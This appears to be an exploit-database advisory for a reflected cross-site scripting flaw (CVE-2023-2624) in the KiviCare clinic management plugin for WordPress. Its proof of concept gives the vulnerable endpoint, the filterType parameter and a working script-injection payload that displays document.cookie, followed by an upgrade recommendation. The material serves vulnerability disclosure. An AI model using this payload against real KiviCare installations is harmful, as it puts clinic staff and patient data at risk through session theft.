WordPress KiviCare 3.2.0 Cross Site Scripting Vulnerability

2023-10-0300:00:00

Arvandy

0day.today

270

wordpress

kivicare

cross site scripting

vulnerability

clinic management system

reflected

cve-2023-2624

injection

upgrade

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.003

Percentile

72.0%

JSON

# Exploit Title: WP Plugins KiviCare 3.2.0 - Reflected Cross-Site Scripting
# Exploit Author: Arvandy
# Software Link: https://wordpress.org/plugins/kivicare-clinic-management-system/
# Vendor Homepage: https://kivicare.io/
# Version: 3.2.0
# Tested on: Windows, Linux
# CVE: CVE-2023-2624

# Product Description
KiviCare is the most affordable self-hosted clinic and patient management system based on the WordPress platform. Set up your online clinic in no time. Ref: https://kivicare.io/

# Vulnerability overview:
The Wordpress plugins KiviCare - Clinic & Patient Management System (EHR) <= 3.2.0 is vulnerable to reflected cross-site scripting via the filterType parameter in the get weekly appointment function. This vulnerability could allow a malicious actor to inject malicious scripts.

# Proof of Concept:

Affected Endpoint: /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=
Affected Parameters: filterType
XSS Payload: <img src=x onerror=alert(document.cookie)>
http://192.168.56.115/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E

# Recommendation
Upgrade to version 3.2.1